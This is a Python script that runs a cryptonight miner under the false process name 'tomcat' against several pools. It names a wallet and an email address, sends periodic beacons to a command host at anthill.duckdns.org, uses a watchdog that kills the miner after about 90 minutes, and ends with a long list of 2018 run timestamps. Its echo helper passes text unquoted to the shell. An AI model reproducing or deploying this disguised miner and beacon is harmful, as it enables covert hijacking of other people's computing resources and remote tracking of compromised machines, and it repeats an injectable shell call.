import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:38:01.985025
#2018-02-17 17:26:06.837271
#2018-02-17 19:15:01.574606
#2018-02-17 21:03:05.348297
#2018-02-17 22:48:05.205164
#2018-02-18 00:33:04.559514
#2018-02-18 02:23:04.078496
#2018-02-18 04:10:08.083955
#2018-02-18 06:01:04.230183
#2018-02-18 07:51:05.569226
#2018-02-18 09:38:07.076399
#2018-02-18 11:25:05.306389
#2018-02-18 13:11:04.626988
#2018-02-18 14:59:05.188350
#2018-02-18 16:48:05.416560
#2018-02-18 18:36:05.787295
#2018-02-18 20:24:06.075679
#2018-02-18 22:10:07.381546
#2018-02-18 23:59:06.417345
#2018-02-19 01:46:04.840458
#2018-02-19 03:34:06.145150
#2018-02-19 05:19:03.972135
#2018-02-19 07:05:07.019189
#2018-02-19 08:54:07.525413
#2018-02-19 10:43:02.134679
#2018-02-19 12:31:01.736226
#2018-02-19 14:18:08.363668
#2018-02-19 16:08:06.575041
#2018-02-19 17:57:05.271818
#2018-02-19 19:45:05.771627
#2018-02-19 21:34:03.544944
#2018-02-19 23:20:05.882729
#2018-02-20 01:06:05.851660
#2018-02-20 02:54:05.445999
#2018-02-20 04:43:03.879028
#2018-02-20 06:27:03.455623
#2018-02-20 08:12:01.426418
#2018-02-20 09:57:08.978684
#2018-02-20 11:41:06.415963
#2018-02-20 13:28:05.127803
#2018-02-20 15:14:07.945843
#2018-02-20 16:59:05.266086
#2018-02-20 18:47:04.829482
#2018-02-20 20:40:04.105175
#2018-02-20 22:26:07.565451
#2018-02-21 01:12:06.404320
#2018-02-21 02:58:04.134556
#2018-02-21 04:46:05.532740
#2018-02-21 06:35:08.410067
#2018-02-21 08:23:02.115665
#2018-02-21 10:08:01.876101
#2018-02-21 11:57:06.785949
#2018-02-21 13:48:09.046235
#2018-02-21 15:34:09.757824
#2018-02-21 17:26:07.302224
#2018-02-21 19:14:05.477443
#2018-02-21 21:02:04.357231
#2018-02-21 22:48:07.946000
#2018-02-22 00:41:01.274229
#2018-02-22 02:27:05.139816
#2018-02-22 04:14:05.864233
#2018-02-22 05:59:04.877185
#2018-02-22 07:46:04.163372
#2018-02-22 09:33:06.387578
#2018-02-22 11:18:05.783576
#2018-02-22 13:03:07.548432
#2018-02-22 14:50:08.524170
#2018-02-22 16:37:02.271162
#2018-02-22 18:24:01.646475
#2018-02-22 20:16:04.684458
#2018-02-22 22:02:04.628135
#2018-02-22 23:48:02.207986
#2018-02-23 01:36:08.059988
#2018-02-23 03:23:01.822541
#2018-02-23 05:09:05.317843
#2018-02-23 06:54:06.805498
#2018-02-23 08:44:03.988879
#2018-02-23 11:04:06.802480
#2018-02-23 12:58:06.938067
#2018-02-23 14:43:06.019993
#2018-02-23 16:33:06.038749
#2018-02-23 18:19:04.452342
#2018-02-23 20:04:08.019521
#2018-02-23 21:51:01.933035
#2018-02-23 23:37:06.342433
#2018-02-24 01:26:05.550442
#2018-02-24 03:16:01.927257
#2018-02-24 05:00:01.611326
#2018-02-24 06:49:01.230640
#2018-02-24 08:40:01.373771
#2018-02-24 10:24:01.332625
#2018-02-24 12:19:04.477860
#2018-02-24 14:12:03.642562
#2018-02-24 15:59:01.929341
#2018-02-24 17:51:07.403112
#2018-02-24 19:38:05.796268
#2018-02-24 21:25:01.412781
#2018-02-25 00:07:03.840960
#2018-02-25 04:16:08.152140
#2018-02-25 07:47:01.443354